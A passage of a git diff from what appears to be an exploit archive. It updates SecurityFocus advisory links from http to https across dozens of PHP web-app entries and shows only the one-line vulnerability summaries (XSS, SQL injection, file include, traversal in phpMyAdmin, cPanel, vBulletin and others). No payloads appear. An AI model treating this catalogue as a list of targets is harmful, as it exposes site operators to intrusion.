+1,4 @@ -source: http://www.securityfocus.com/bid/21112/info +source: https://www.securityfocus.com/bid/21112/info Hot Links is prone to an information-disclosure vulnerability because it fails to authenticate the user during specific download requests. diff --git a/exploits/php/webapps/29049.txt b/exploits/php/webapps/29049.txt index b0341b5ec..dcb93ea8e 100644 --- a/exploits/php/webapps/29049.txt +++ b/exploits/php/webapps/29049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21125/info +source: https://www.securityfocus.com/bid/21125/info BlogTorrent Preview is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29050.txt b/exploits/php/webapps/29050.txt index e698c4357..994bc9ee3 100644 --- a/exploits/php/webapps/29050.txt +++ b/exploits/php/webapps/29050.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21128/info +source: https://www.securityfocus.com/bid/21128/info Odysseus Blog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29051.txt b/exploits/php/webapps/29051.txt index 60e39e710..444d501ba 100644 --- a/exploits/php/webapps/29051.txt +++ b/exploits/php/webapps/29051.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21129/info +source: https://www.securityfocus.com/bid/21129/info Sphpblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29058.txt b/exploits/php/webapps/29058.txt index 7eeca1560..492f24d67 100644 --- a/exploits/php/webapps/29058.txt +++ b/exploits/php/webapps/29058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29059.txt b/exploits/php/webapps/29059.txt index 2f960e6e2..fe2db5622 100644 --- a/exploits/php/webapps/29059.txt +++ b/exploits/php/webapps/29059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29060.txt b/exploits/php/webapps/29060.txt index 5d94af9d2..772b167b1 100644 --- a/exploits/php/webapps/29060.txt +++ b/exploits/php/webapps/29060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29061.txt b/exploits/php/webapps/29061.txt index 647fadaa2..0b32af9ff 100644 --- a/exploits/php/webapps/29061.txt +++ b/exploits/php/webapps/29061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29062.txt b/exploits/php/webapps/29062.txt index efeda2bc4..68e408cfa 100644 --- a/exploits/php/webapps/29062.txt +++ b/exploits/php/webapps/29062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21137/info +source: https://www.securityfocus.com/bid/21137/info phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29071.txt b/exploits/php/webapps/29071.txt index 6d161b761..45ac4b48b 100644 --- a/exploits/php/webapps/29071.txt +++ b/exploits/php/webapps/29071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21142/info +source: https://www.securityfocus.com/bid/21142/info Cpanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29072.txt b/exploits/php/webapps/29072.txt index 6f5740df7..ea46c08cb 100644 --- a/exploits/php/webapps/29072.txt +++ b/exploits/php/webapps/29072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21150/info +source: https://www.securityfocus.com/bid/21150/info PHP Upload Tool is prone to an arbitrary file-upload vulnerability and a directory-traversal vulnerability. These issues occur because the application fails to sanitize user-supplied data. diff --git a/exploits/php/webapps/29079.txt b/exploits/php/webapps/29079.txt index 77bcbcf4c..ced0ab3a7 100644 --- a/exploits/php/webapps/29079.txt +++ b/exploits/php/webapps/29079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21157/info +source: https://www.securityfocus.com/bid/21157/info vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29095.txt b/exploits/php/webapps/29095.txt index 95ee2edf4..67681afcf 100644 --- a/exploits/php/webapps/29095.txt +++ b/exploits/php/webapps/29095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21173/info +source: https://www.securityfocus.com/bid/21173/info BLOG:CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29097.txt b/exploits/php/webapps/29097.txt index da2152f43..2d342bda0 100644 --- a/exploits/php/webapps/29097.txt +++ b/exploits/php/webapps/29097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21182/info +source: https://www.securityfocus.com/bid/21182/info Dolphin is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29098.txt b/exploits/php/webapps/29098.txt index 02004f3eb..d61340e19 100644 --- a/exploits/php/webapps/29098.txt +++ b/exploits/php/webapps/29098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29099.txt b/exploits/php/webapps/29099.txt index 784d264cc..b5ceae64f 100644 --- a/exploits/php/webapps/29099.txt +++ b/exploits/php/webapps/29099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29100.txt b/exploits/php/webapps/29100.txt index f505ede35..71b8a6b2d 100644 --- a/exploits/php/webapps/29100.txt +++ b/exploits/php/webapps/29100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29101.txt b/exploits/php/webapps/29101.txt index 420fbfe66..965a8a1f6 100644 --- a/exploits/php/webapps/29101.txt +++ b/exploits/php/webapps/29101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21184/info +source: https://www.securityfocus.com/bid/21184/info BirdBlog is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29128.txt b/exploits/php/webapps/29128.txt index ce4b11bee..3188b403d 100644 --- a/exploits/php/webapps/29128.txt +++ b/exploits/php/webapps/29128.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21196/info +source: https://www.securityfocus.com/bid/21196/info Vikingboard is prone to multiple HTML-injection vulnerabilities and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29145.txt b/exploits/php/webapps/29145.txt index dec3799cb..248c6c09a 100644 --- a/exploits/php/webapps/29145.txt +++ b/exploits/php/webapps/29145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21213/info +source: https://www.securityfocus.com/bid/21213/info Wabbit PHP Gallery is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29157.txt b/exploits/php/webapps/29157.txt index d7b804c97..2063b1424 100644 --- a/exploits/php/webapps/29157.txt +++ b/exploits/php/webapps/29157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21232/info +source: https://www.securityfocus.com/bid/21232/info Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29158.txt b/exploits/php/webapps/29158.txt index d9931cc3a..cb8587501 100644 --- a/exploits/php/webapps/29158.txt +++ b/exploits/php/webapps/29158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21233/info +source: https://www.securityfocus.com/bid/21233/info CuteNews is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29159.txt b/exploits/php/webapps/29159.txt index b7f84fcc0..ba5f2ed37 100644 --- a/exploits/php/webapps/29159.txt +++ b/exploits/php/webapps/29159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21233/info +source: https://www.securityfocus.com/bid/21233/info CuteNews is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities. diff --git a/exploits/php/webapps/29162.txt b/exploits/php/webapps/29162.txt index 889a544a1..ae8b01b3a 100644 --- a/exploits/php/webapps/29162.txt +++ b/exploits/php/webapps/29162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21238/info +source: https://www.securityfocus.com/bid/21238/info My Little Weblog is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to the 'action' parameter of the 'weblog.php' script. diff --git a/exploits/php/webapps/29165.txt b/exploits/php/webapps/29165.txt index 339e0cb73..89c8ec64a 100644 --- a/exploits/php/webapps/29165.txt +++ b/exploits/php/webapps/29165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21250/info +source: https://www.securityfocus.com/bid/21250/info InverseFlow Help Desk is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29166.txt b/exploits/php/webapps/29166.txt index 63e6d2e37..1d42f1395 100644 --- a/exploits/php/webapps/29166.txt +++ b/exploits/php/webapps/29166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21250/info +source: https://www.securityfocus.com/bid/21250/info InverseFlow Help Desk is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/29173.txt b/exploits/php/webapps/29173.txt index b8823586a..21a42c346 100644 --- a/exploits/php/webapps/29173.txt +++ b/exploits/php/webapps/29173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21263/info +source: https://www.securityfocus.com/bid/21263/info Active PHP Bookmarks application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29175.txt b/exploits/php/webapps/29175.txt index f7a47ef6c..d16be118d 100644 --- a/exploits/php/webapps/29175.txt +++ b/exploits/php/webapps/29175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21278/info +source: https://www.securityfocus.com/bid/21278/info Simple PHP Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29177.txt b/exploits/php/webapps/29177.txt index a0b88efff..66d1298a7 100644 --- a/exploits/php/webapps/29177.txt +++ b/exploits/php/webapps/29177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21281/info +source: https://www.securityfocus.com/bid/21281/info The mmgallery script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29181.txt b/exploits/php/webapps/29181.txt index 5e209a7ba..3a5722d95 100644 --- a/exploits/php/webapps/29181.txt +++ b/exploits/php/webapps/29181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21287/info +source: https://www.securityfocus.com/bid/21287/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29182.txt b/exploits/php/webapps/29182.txt index abec2f200..3ca6fcc05 100644 --- a/exploits/php/webapps/29182.txt +++ b/exploits/php/webapps/29182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29183.txt b/exploits/php/webapps/29183.txt index 635868f0c..c155596bc 100644 --- a/exploits/php/webapps/29183.txt +++ b/exploits/php/webapps/29183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29184.txt b/exploits/php/webapps/29184.txt index f14ade73b..7cae5af0d 100644 --- a/exploits/php/webapps/29184.txt +++ b/exploits/php/webapps/29184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29185.txt b/exploits/php/webapps/29185.txt index 8e83e8182..c9474a3f4 100644 --- a/exploits/php/webapps/29185.txt +++ b/exploits/php/webapps/29185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29186.txt b/exploits/php/webapps/29186.txt index 895031a0b..2a6987604 100644 --- a/exploits/php/webapps/29186.txt +++ b/exploits/php/webapps/29186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29187.txt b/exploits/php/webapps/29187.txt index cfc69c03a..a39f7081e 100644 --- a/exploits/php/webapps/29187.txt +++ b/exploits/php/webapps/29187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29188.txt b/exploits/php/webapps/29188.txt index 88141ea58..d83908d20 100644 --- a/exploits/php/webapps/29188.txt +++ b/exploits/php/webapps/29188.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21288/info +source: https://www.securityfocus.com/bid/21288/info WebHost Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29198.txt b/exploits/php/webapps/29198.txt index 48dbfcc67..69d98dc46 100644 --- a/exploits/php/webapps/29198.txt +++ b/exploits/php/webapps/29198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29199.txt b/exploits/php/webapps/29199.txt index cf059764a..a94fae9b5 100644 --- a/exploits/php/webapps/29199.txt +++ b/exploits/php/webapps/29199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29200.txt b/exploits/php/webapps/29200.txt index ae493c9e0..9172b4d91 100644 --- a/exploits/php/webapps/29200.txt +++ b/exploits/php/webapps/29200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21334/info +source: https://www.securityfocus.com/bid/21334/info The b2evolution application is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29202.txt b/exploits/php/webapps/29202.txt index d04c14eb4..6aa1fa540 100644 --- a/exploits/php/webapps/29202.txt +++ b/exploits/php/webapps/29202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21366/info +source: https://www.securityfocus.com/bid/21366/info Seditio and Land Down Under are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29203.php b/exploits/php/webapps/29203.php index 59523bcb9..146eaba4e 100644 --- a/exploits/php/webapps/29203.php +++ b/exploits/php/webapps/29203.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21370/info +source: https://www.securityfocus.com/bid/21370/info Woltlab Burning Board is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29205.txt b/exploits/php/webapps/29205.txt index 4a79a57f8..16c8994cb 100644 --- a/exploits/php/webapps/29205.txt +++ b/exploits/php/webapps/29205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21388/info +source: https://www.securityfocus.com/bid/21388/info Invision Gallery is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29207.txt b/exploits/php/webapps/29207.txt index 91586e519..7480eab02 100644 --- a/exploits/php/webapps/29207.txt +++ b/exploits/php/webapps/29207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21391/info +source: https://www.securityfocus.com/bid/21391/info deV!Lz Clanportal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29215.txt b/exploits/php/webapps/29215.txt index d4d1ec1ee..a09c2dc1b 100644 --- a/exploits/php/webapps/29215.txt +++ b/exploits/php/webapps/29215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21394/info +source: https://www.securityfocus.com/bid/21394/info FreeQboard is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29217.txt b/exploits/php/webapps/29217.txt index e8a508924..aade50419 100644 --- a/exploits/php/webapps/29217.txt +++ b/exploits/php/webapps/29217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21403/info +source: https://www.securityfocus.com/bid/21403/info CuteNews is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29218.txt b/exploits/php/webapps/29218.txt index 1cfb4c23c..24b175dd8 100644 --- a/exploits/php/webapps/29218.txt +++ b/exploits/php/webapps/29218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21404/info +source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29222.txt b/exploits/php/webapps/29222.txt index b780d8b84..a39a8c392 100644 --- a/exploits/php/webapps/29222.txt +++ b/exploits/php/webapps/29222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21423/info +source: https://www.securityfocus.com/bid/21423/info Cerberus Helpdesk is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29223.txt b/exploits/php/webapps/29223.txt index 94fa1246e..4925f387c 100644 --- a/exploits/php/webapps/29223.txt +++ b/exploits/php/webapps/29223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21424/info +source: https://www.securityfocus.com/bid/21424/info Inside Systems Mail is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29225.txt b/exploits/php/webapps/29225.txt index 1f31fe206..0f8728a00 100644 --- a/exploits/php/webapps/29225.txt +++ b/exploits/php/webapps/29225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21427/info +source: https://www.securityfocus.com/bid/21427/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29226.txt b/exploits/php/webapps/29226.txt index d56169123..0bb291904 100644 --- a/exploits/php/webapps/29226.txt +++ b/exploits/php/webapps/29226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21427/info +source: https://www.securityfocus.com/bid/21427/info Mobile is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29232.txt b/exploits/php/webapps/29232.txt index ac6c17895..f445b83c0 100644 --- a/exploits/php/webapps/29232.txt +++ b/exploits/php/webapps/29232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21464/info +source: https://www.securityfocus.com/bid/21464/info Link CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29233.txt b/exploits/php/webapps/29233.txt index 40505dc50..ed732d378 100644 --- a/exploits/php/webapps/29233.txt +++ b/exploits/php/webapps/29233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21464/info +source: https://www.securityfocus.com/bid/21464/info Link CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29237.txt b/exploits/php/webapps/29237.txt index e05c95ede..010c1a8a6 100644 --- a/exploits/php/webapps/29237.txt +++ b/exploits/php/webapps/29237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21497/info +source: https://www.securityfocus.com/bid/21497/info cPanel BoxTrapper is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29238.txt b/exploits/php/webapps/29238.txt index 4e856be16..78528062b 100644 --- a/exploits/php/webapps/29238.txt +++ b/exploits/php/webapps/29238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21498/info +source: https://www.securityfocus.com/bid/21498/info Web Hosting Manager is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29242.txt b/exploits/php/webapps/29242.txt index d1026c42b..c4897737c 100644 --- a/exploits/php/webapps/29242.txt +++ b/exploits/php/webapps/29242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29243.txt b/exploits/php/webapps/29243.txt index 208d488b7..79f1daca8 100644 --- a/exploits/php/webapps/29243.txt +++ b/exploits/php/webapps/29243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29244.txt b/exploits/php/webapps/29244.txt index b4f9b8e4c..928919a7f 100644 --- a/exploits/php/webapps/29244.txt +++ b/exploits/php/webapps/29244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29245.txt b/exploits/php/webapps/29245.txt index 0ba8c044e..dfc579335 100644 --- a/exploits/php/webapps/29245.txt +++ b/exploits/php/webapps/29245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21513/info +source: https://www.securityfocus.com/bid/21513/info Messageriescripthp is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29246.txt b/exploits/php/webapps/29246.txt index 6359ba38d..dcfb00bfe 100644 --- a/exploits/php/webapps/29246.txt +++ b/exploits/php/webapps/29246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29247.txt b/exploits/php/webapps/29247.txt index cc0bc6468..4d2dfb274 100644 --- a/exploits/php/webapps/29247.txt +++ b/exploits/php/webapps/29247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29248.txt b/exploits/php/webapps/29248.txt index b908a1e28..ed7c40727 100644 --- a/exploits/php/webapps/29248.txt +++ b/exploits/php/webapps/29248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29249.txt b/exploits/php/webapps/29249.txt index 3c04a8544..ce55a3ab1 100644 --- a/exploits/php/webapps/29249.txt +++ b/exploits/php/webapps/29249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29250.txt b/exploits/php/webapps/29250.txt index 4c35837b2..6a329a07c 100644 --- a/exploits/php/webapps/29250.txt +++ b/exploits/php/webapps/29250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29251.txt b/exploits/php/webapps/29251.txt index 9bfb2d5de..d012812c4 100644 --- a/exploits/php/webapps/29251.txt +++ b/exploits/php/webapps/29251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29252.txt b/exploits/php/webapps/29252.txt index 6698e598a..9ba72b085 100644 --- a/exploits/php/webapps/29252.txt +++ b/exploits/php/webapps/29252.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29253.txt b/exploits/php/webapps/29253.txt index f1b908584..7447af8cf 100644 --- a/exploits/php/webapps/29253.txt +++ b/exploits/php/webapps/29253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21514/info +source: https://www.securityfocus.com/bid/21514/info AnnonceScriptHP is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29254.txt b/exploits/php/webapps/29254.txt index f5f12dc12..39a189036 100644 --- a/exploits/php/webapps/29254.txt +++ b/exploits/php/webapps/29254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21515/info +source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29255.txt b/exploits/php/webapps/29255.txt index 052d56424..bbf8abc8a 100644 --- a/exploits/php/webapps/29255.txt +++ b/exploits/php/webapps/29255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21515/info +source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29267.txt b/exploits/php/webapps/29267.txt index 1bb007b72..80ba617cd 100644 --- a/exploits/php/webapps/29267.txt +++ b/exploits/php/webapps/29267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29268.txt b/exploits/php/webapps/29268.txt index 9cb85745d..817c92549 100644 --- a/exploits/php/webapps/29268.txt +++ b/exploits/php/webapps/29268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29269.txt b/exploits/php/webapps/29269.txt index 4121312f6..9e3b02137 100644 --- a/exploits/php/webapps/29269.txt +++ b/exploits/php/webapps/29269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21516/info +source: https://www.securityfocus.com/bid/21516/info ProNews is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues, an SQL-injection issue, and a cross-site 